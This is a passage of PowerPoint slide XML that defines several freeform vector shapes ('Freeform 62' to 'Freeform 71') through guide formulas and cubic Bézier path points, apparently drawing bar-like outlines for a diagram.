                    <a:pt x="4" y="139"/>
                    <a:pt x="3" y="140"/>
                    <a:pt x="2" y="140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1" y="139"/>
                    <a:pt x="0" y="139"/>
                    <a:pt x="0" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="27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2" y="0"/>
                    <a:pt x="29" y="0"/>
                    <a:pt x="29" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="31" y="1"/>
                    <a:pt x="31" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="3"/>
                    <a:pt x="32" y="110"/>
                    <a:pt x="32" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="139"/>
                    <a:pt x="31" y="140"/>
                    <a:pt x="30" y="14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3" name="Freeform 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4121150" y="4719638"/>
              <a:ext cx="373063" cy="149225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 50"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 29 w 50"/>
                <a:gd name="T3" fmla="*/ 20 h 20"/>
                <a:gd name="T4" fmla="*/ 30 w 50"/>
                <a:gd name="T5" fmla="*/ 17 h 20"/>
                <a:gd name="T6" fmla="*/ 37 w 50"/>
                <a:gd name="T7" fmla="*/ 9 h 20"/>
                <a:gd name="T8" fmla="*/ 43 w 50"/>
                <a:gd name="T9" fmla="*/ 4 h 20"/>
                <a:gd name="T10" fmla="*/ 22 w 50"/>
                <a:gd name="T11" fmla="*/ 4 h 20"/>
                <a:gd name="T12" fmla="*/ 4 w 50"/>
                <a:gd name="T13" fmla="*/ 19 h 20"/>
                <a:gd name="T14" fmla="*/ 1 w 50"/>
                <a:gd name="T15" fmla="*/ 19 h 20"/>
                <a:gd name="T16" fmla="*/ 1 w 50"/>
                <a:gd name="T17" fmla="*/ 16 h 20"/>
                <a:gd name="T18" fmla="*/ 20 w 50"/>
                <a:gd name="T19" fmla="*/ 0 h 20"/>
                <a:gd name="T20" fmla="*/ 21 w 50"/>
                <a:gd name="T21" fmla="*/ 0 h 20"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 0 h 20"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 1 h 20"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 3 h 20"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 12 h 20"/>
                <a:gd name="T30" fmla="*/ 32 w 50"/>
                <a:gd name="T31" fmla="*/ 20 h 20"/>
                <a:gd name="T32" fmla="*/ 31 w 50"/>
                <a:gd name="T3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20">
                  <a:moveTo>
                    <a:pt x="31" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="20"/>
                    <a:pt x="30" y="20"/>
                    <a:pt x="29" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="19"/>
                    <a:pt x="29" y="18"/>
                    <a:pt x="30" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="14"/>
                    <a:pt x="35" y="12"/>
                    <a:pt x="37" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="7"/>
                    <a:pt x="41" y="6"/>
                    <a:pt x="43" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="4"/>
                    <a:pt x="25" y="4"/>
                    <a:pt x="22" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="6"/>
                    <a:pt x="13" y="12"/>
                    <a:pt x="4" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="1" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="7"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="50" y="0"/>
                    <a:pt x="50" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="2"/>
                    <a:pt x="50" y="3"/>
                    <a:pt x="49" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="6"/>
                    <a:pt x="43" y="9"/>
                    <a:pt x="40" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="14"/>
                    <a:pt x="35" y="17"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="31" y="20"/>
                    <a:pt x="31" y="2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" name="Freeform 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4464050" y="4719638"/>
              <a:ext cx="38100" cy="1100138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 5"/>
                <a:gd name="T1" fmla="*/ 147 h 147"/>
                <a:gd name="T2" fmla="*/ 1 w 5"/>
                <a:gd name="T3" fmla="*/ 145 h 147"/>
                <a:gd name="T4" fmla="*/ 0 w 5"/>
                <a:gd name="T5" fmla="*/ 2 h 147"/>
                <a:gd name="T6" fmla="*/ 2 w 5"/>
                <a:gd name="T7" fmla="*/ 0 h 147"/>
                <a:gd name="T8" fmla="*/ 4 w 5"/>
                <a:gd name="T9" fmla="*/ 2 h 147"/>
                <a:gd name="T10" fmla="*/ 5 w 5"/>
                <a:gd name="T11" fmla="*/ 145 h 147"/>
                <a:gd name="T12" fmla="*/ 3 w 5"/>
                <a:gd name="T13" fmla="*/ 147 h 147"/>
                <a:gd name="T14" fmla="*/ 3 w 5"/>
                <a:gd name="T1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47">
                  <a:moveTo>
                    <a:pt x="3" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="147"/>
                    <a:pt x="1" y="146"/>
                    <a:pt x="1" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="121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6"/>
                    <a:pt x="4" y="114"/>
                    <a:pt x="5" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="146"/>
                    <a:pt x="4" y="147"/>
                    <a:pt x="3" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="147"/>
                    <a:pt x="3" y="147"/>
                    <a:pt x="3" y="147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5" name="Freeform 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4127500" y="5857876"/>
              <a:ext cx="239713" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 5 h 5"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 5 h 5"/>
                <a:gd name="T4" fmla="*/ 16 w 32"/>
                <a:gd name="T5" fmla="*/ 4 h 5"/>
                <a:gd name="T6" fmla="*/ 2 w 32"/>
                <a:gd name="T7" fmla="*/ 4 h 5"/>
                <a:gd name="T8" fmla="*/ 0 w 32"/>
                <a:gd name="T9" fmla="*/ 2 h 5"/>
                <a:gd name="T10" fmla="*/ 2 w 32"/>
                <a:gd name="T11" fmla="*/ 0 h 5"/>
                <a:gd name="T12" fmla="*/ 16 w 32"/>
                <a:gd name="T13" fmla="*/ 0 h 5"/>
                <a:gd name="T14" fmla="*/ 30 w 32"/>
                <a:gd name="T15" fmla="*/ 1 h 5"/>
                <a:gd name="T16" fmla="*/ 32 w 32"/>
                <a:gd name="T17" fmla="*/ 3 h 5"/>
                <a:gd name="T18" fmla="*/ 30 w 32"/>
                <a:gd name="T1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5"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24" y="5"/>
                    <a:pt x="20" y="5"/>
                    <a:pt x="16" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="4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" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="24" y="1"/>
                    <a:pt x="30" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="32" y="2"/>
                    <a:pt x="32" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="4"/>
                    <a:pt x="31" y="5"/>
                    <a:pt x="30" y="5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Freeform 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4329113" y="5789613"/>
              <a:ext cx="165100" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 22"/>
                <a:gd name="T1" fmla="*/ 14 h 14"/>
                <a:gd name="T2" fmla="*/ 1 w 22"/>
                <a:gd name="T3" fmla="*/ 13 h 14"/>
                <a:gd name="T4" fmla="*/ 2 w 22"/>
                <a:gd name="T5" fmla="*/ 10 h 14"/>
                <a:gd name="T6" fmla="*/ 19 w 22"/>
                <a:gd name="T7" fmla="*/ 0 h 14"/>
                <a:gd name="T8" fmla="*/ 22 w 22"/>
                <a:gd name="T9" fmla="*/ 1 h 14"/>
                <a:gd name="T10" fmla="*/ 21 w 22"/>
                <a:gd name="T11" fmla="*/ 4 h 14"/>
                <a:gd name="T12" fmla="*/ 4 w 22"/>
                <a:gd name="T13" fmla="*/ 14 h 14"/>
                <a:gd name="T14" fmla="*/ 3 w 22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4">
                  <a:moveTo>
                    <a:pt x="3" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="14"/>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="1" y="11"/>
                    <a:pt x="2" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="8"/>
                    <a:pt x="14" y="4"/>
                    <a:pt x="19" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="22" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="3"/>
                    <a:pt x="21" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="8"/>
                    <a:pt x="10" y="11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Freeform 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4552950" y="4494213"/>
              <a:ext cx="239713" cy="1392238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 186 h 186"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 186 h 186"/>
                <a:gd name="T4" fmla="*/ 28 w 32"/>
                <a:gd name="T5" fmla="*/ 184 h 186"/>
                <a:gd name="T6" fmla="*/ 27 w 32"/>
                <a:gd name="T7" fmla="*/ 5 h 186"/>
                <a:gd name="T8" fmla="*/ 4 w 32"/>
                <a:gd name="T9" fmla="*/ 4 h 186"/>
                <a:gd name="T10" fmla="*/ 4 w 32"/>
                <a:gd name="T11" fmla="*/ 184 h 186"/>
                <a:gd name="T12" fmla="*/ 2 w 32"/>
                <a:gd name="T13" fmla="*/ 186 h 186"/>
                <a:gd name="T14" fmla="*/ 2 w 32"/>
                <a:gd name="T15" fmla="*/ 186 h 186"/>
                <a:gd name="T16" fmla="*/ 0 w 32"/>
                <a:gd name="T17" fmla="*/ 183 h 186"/>
                <a:gd name="T18" fmla="*/ 0 w 32"/>
                <a:gd name="T19" fmla="*/ 2 h 186"/>
                <a:gd name="T20" fmla="*/ 0 w 32"/>
                <a:gd name="T21" fmla="*/ 0 h 186"/>
                <a:gd name="T22" fmla="*/ 2 w 32"/>
                <a:gd name="T23" fmla="*/ 0 h 186"/>
                <a:gd name="T24" fmla="*/ 2 w 32"/>
                <a:gd name="T25" fmla="*/ 0 h 186"/>
                <a:gd name="T26" fmla="*/ 29 w 32"/>
                <a:gd name="T27" fmla="*/ 1 h 186"/>
                <a:gd name="T28" fmla="*/ 31 w 32"/>
                <a:gd name="T29" fmla="*/ 3 h 186"/>
                <a:gd name="T30" fmla="*/ 32 w 32"/>
                <a:gd name="T31" fmla="*/ 184 h 186"/>
                <a:gd name="T32" fmla="*/ 30 w 32"/>
                <a:gd name="T33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186">
                  <a:moveTo>
                    <a:pt x="30" y="186"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="186"/>
                    <a:pt x="30" y="186"/>
                    <a:pt x="30" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="186"/>
                    <a:pt x="28" y="185"/>
                    <a:pt x="28" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="157"/>
                    <a:pt x="27" y="22"/>
                    <a:pt x="27" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="4"/>
                    <a:pt x="12" y="4"/>
                    <a:pt x="4" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="33"/>
                    <a:pt x="4" y="150"/>
                    <a:pt x="4" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="185"/>
                    <a:pt x="3" y="186"/>
                    <a:pt x="2" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="186"/>
                    <a:pt x="2" y="186"/>
                    <a:pt x="2" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="185"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="149"/>
                    <a:pt x="0" y="27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2" y="0"/>
                    <a:pt x="29" y="1"/>
                    <a:pt x="29" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1"/>
                    <a:pt x="31" y="2"/>
                    <a:pt x="31" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="4"/>
                    <a:pt x="32" y="156"/>
                    <a:pt x="32" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="185"/>
                    <a:pt x="31" y="186"/>
                    <a:pt x="30" y="186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Freeform 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4546600" y="4375151"/>
              <a:ext cx="373063" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 50"/>
                <a:gd name="T1" fmla="*/ 21 h 21"/>
                <a:gd name="T2" fmla="*/ 29 w 50"/>
                <a:gd name="T3" fmla="*/ 20 h 21"/>
                <a:gd name="T4" fmla="*/ 30 w 50"/>
                <a:gd name="T5" fmla="*/ 17 h 21"/>
                <a:gd name="T6" fmla="*/ 37 w 50"/>
                <a:gd name="T7" fmla="*/ 9 h 21"/>
                <a:gd name="T8" fmla="*/ 43 w 50"/>
                <a:gd name="T9" fmla="*/ 4 h 21"/>
                <a:gd name="T10" fmla="*/ 22 w 50"/>
                <a:gd name="T11" fmla="*/ 4 h 21"/>
                <a:gd name="T12" fmla="*/ 4 w 50"/>
                <a:gd name="T13" fmla="*/ 19 h 21"/>
                <a:gd name="T14" fmla="*/ 1 w 50"/>
                <a:gd name="T15" fmla="*/ 19 h 21"/>
                <a:gd name="T16" fmla="*/ 1 w 50"/>
                <a:gd name="T17" fmla="*/ 16 h 21"/>
                <a:gd name="T18" fmla="*/ 20 w 50"/>
                <a:gd name="T19" fmla="*/ 1 h 21"/>
                <a:gd name="T20" fmla="*/ 21 w 50"/>
                <a:gd name="T21" fmla="*/ 0 h 21"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 0 h 21"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 1 h 21"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 4 h 21"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 12 h 21"/>
                <a:gd name="T30" fmla="*/ 32 w 50"/>
                <a:gd name="T31" fmla="*/ 20 h 21"/>
                <a:gd name="T32" fmla="*/ 31 w 50"/>
                <a:gd name="T3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21">
                  <a:moveTo>
                    <a:pt x="31" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="21"/>
                    <a:pt x="30" y="20"/>
                    <a:pt x="29" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="19"/>
                    <a:pt x="29" y="18"/>
                    <a:pt x="30" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="14"/>
                    <a:pt x="35" y="12"/>
                    <a:pt x="37" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="8"/>
                    <a:pt x="41" y="6"/>
                    <a:pt x="43" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="4"/>
                    <a:pt x="25" y="4"/>
                    <a:pt x="22" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="6"/>
                    <a:pt x="13" y="12"/>
                    <a:pt x="4" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="1" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="7"/>
                    <a:pt x="20" y="1"/>
                    <a:pt x="20" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="50" y="1"/>
                    <a:pt x="50" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="2"/>
                    <a:pt x="50" y="3"/>
                    <a:pt x="49" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="7"/>
                    <a:pt x="43" y="9"/>
                    <a:pt x="40" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="15"/>
                    <a:pt x="35" y="17"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="31" y="21"/>
                    <a:pt x="31" y="2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9" name="Freeform 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4889500" y="4375151"/>
              <a:ext cx="38100" cy="1444625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 5"/>
                <a:gd name="T1" fmla="*/ 193 h 193"/>
                <a:gd name="T2" fmla="*/ 1 w 5"/>
                <a:gd name="T3" fmla="*/ 191 h 193"/>
                <a:gd name="T4" fmla="*/ 0 w 5"/>
                <a:gd name="T5" fmla="*/ 24 h 193"/>
                <a:gd name="T6" fmla="*/ 0 w 5"/>
                <a:gd name="T7" fmla="*/ 2 h 193"/>
                <a:gd name="T8" fmla="*/ 0 w 5"/>
                <a:gd name="T9" fmla="*/ 2 h 193"/>
                <a:gd name="T10" fmla="*/ 0 w 5"/>
                <a:gd name="T11" fmla="*/ 2 h 193"/>
                <a:gd name="T12" fmla="*/ 0 w 5"/>
                <a:gd name="T13" fmla="*/ 2 h 193"/>
                <a:gd name="T14" fmla="*/ 0 w 5"/>
                <a:gd name="T15" fmla="*/ 2 h 193"/>
                <a:gd name="T16" fmla="*/ 2 w 5"/>
                <a:gd name="T17" fmla="*/ 0 h 193"/>
                <a:gd name="T18" fmla="*/ 4 w 5"/>
                <a:gd name="T19" fmla="*/ 2 h 193"/>
                <a:gd name="T20" fmla="*/ 4 w 5"/>
                <a:gd name="T21" fmla="*/ 2 h 193"/>
                <a:gd name="T22" fmla="*/ 4 w 5"/>
                <a:gd name="T23" fmla="*/ 3 h 193"/>
                <a:gd name="T24" fmla="*/ 4 w 5"/>
                <a:gd name="T25" fmla="*/ 24 h 193"/>
                <a:gd name="T26" fmla="*/ 5 w 5"/>
                <a:gd name="T27" fmla="*/ 191 h 193"/>
                <a:gd name="T28" fmla="*/ 3 w 5"/>
                <a:gd name="T29" fmla="*/ 193 h 193"/>
                <a:gd name="T30" fmla="*/ 3 w 5"/>
                <a:gd name="T31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193">
                  <a:moveTo>
                    <a:pt x="3" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="1" y="192"/>
                    <a:pt x="1" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="169"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12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3" y="0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3"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="6"/>
                    <a:pt x="4" y="12"/>
                    <a:pt x="4" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="67"/>
                    <a:pt x="4" y="169"/>
                    <a:pt x="5" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="192"/>
                    <a:pt x="4" y="193"/>
                    <a:pt x="3" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="193"/>
                    <a:pt x="3" y="193"/>
                    <a:pt x="3" y="193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0" name="Freeform 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4552950" y="5857876"/>
              <a:ext cx="239713" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 32"/>
                <a:gd name="T1" fmla="*/ 5 h 5"/>
                <a:gd name="T2" fmla="*/ 30 w 32"/>
                <a:gd name="T3" fmla="*/ 5 h 5"/>
                <a:gd name="T4" fmla="*/ 16 w 32"/>
                <a:gd name="T5" fmla="*/ 4 h 5"/>
                <a:gd name="T6" fmla="*/ 2 w 32"/>
                <a:gd name="T7" fmla="*/ 4 h 5"/>
                <a:gd name="T8" fmla="*/ 0 w 32"/>
                <a:gd name="T9" fmla="*/ 2 h 5"/>
                <a:gd name="T10" fmla="*/ 2 w 32"/>
                <a:gd name="T11" fmla="*/ 0 h 5"/>
                <a:gd name="T12" fmla="*/ 16 w 32"/>
                <a:gd name="T13" fmla="*/ 0 h 5"/>
                <a:gd name="T14" fmla="*/ 30 w 32"/>
                <a:gd name="T15" fmla="*/ 1 h 5"/>
                <a:gd name="T16" fmla="*/ 32 w 32"/>
                <a:gd name="T17" fmla="*/ 3 h 5"/>
                <a:gd name="T18" fmla="*/ 30 w 32"/>
                <a:gd name="T1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5"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24" y="5"/>
                    <a:pt x="20" y="5"/>
                    <a:pt x="16" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="4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" y="0"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="24" y="1"/>
                    <a:pt x="30" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="32" y="2"/>
                    <a:pt x="32" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="4"/>
                    <a:pt x="31" y="5"/>
                    <a:pt x="30" y="5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Freeform 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4762500" y="5789613"/>
              <a:ext cx="165100" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 22"/>
                <a:gd name="T1" fmla="*/ 14 h 14"/>
                <a:gd name="T2" fmla="*/ 0 w 22"/>
                <a:gd name="T3" fmla="*/ 13 h 14"/>
                <a:gd name="T4" fmla="*/ 1 w 22"/>
                <a:gd name="T5" fmla="*/ 10 h 14"/>
                <a:gd name="T6" fmla="*/ 18 w 22"/>
                <a:gd name="T7" fmla="*/ 0 h 14"/>
                <a:gd name="T8" fmla="*/ 21 w 22"/>
                <a:gd name="T9" fmla="*/ 1 h 14"/>
                <a:gd name="T10" fmla="*/ 20 w 22"/>
                <a:gd name="T11" fmla="*/ 4 h 14"/>
                <a:gd name="T12" fmla="*/ 3 w 22"/>
                <a:gd name="T13" fmla="*/ 14 h 14"/>
                <a:gd name="T14" fmla="*/ 2 w 22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4">
                  <a:moveTo>
                    <a:pt x="2" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="14"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0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7" y="8"/>
                    <a:pt x="13" y="4"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="20" y="0"/>
                    <a:pt x="21" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="21" y="3"/>
                    <a:pt x="20" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="8"/>
                    <a:pt x="9" y="11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Freeform 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3716337" y="5175251"/>
              <a:ext cx="247650" cy="711200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 33"/>
                <a:gd name="T1" fmla="*/ 95 h 95"/>
                <a:gd name="T2" fmla="*/ 30 w 33"/>
                <a:gd name="T3" fmla="*/ 95 h 95"/>
                <a:gd name="T4" fmla="*/ 28 w 33"/>
                <a:gd name="T5" fmla="*/ 93 h 95"/>
                <a:gd name="T6" fmla="*/ 27 w 33"/>
                <a:gd name="T7" fmla="*/ 5 h 95"/>
                <a:gd name="T8" fmla="*/ 4 w 33"/>
                <a:gd name="T9" fmla="*/ 4 h 95"/>
                <a:gd name="T10" fmla="*/ 4 w 33"/>
                <a:gd name="T11" fmla="*/ 93 h 95"/>
                <a:gd name="T12" fmla="*/ 2 w 33"/>
                <a:gd name="T13" fmla="*/ 95 h 95"/>
                <a:gd name="T14" fmla="*/ 2 w 33"/>
                <a:gd name="T15" fmla="*/ 95 h 95"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 92 h 95"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 2 h 95"/>
                <a:gd name="T20" fmla="*/ 0 w 33"/>
                <a:gd name="T21" fmla="*/ 1 h 95"/>
                <a:gd name="T22" fmla="*/ 2 w 33"/>
                <a:gd name="T23" fmla="*/ 0 h 95"/>
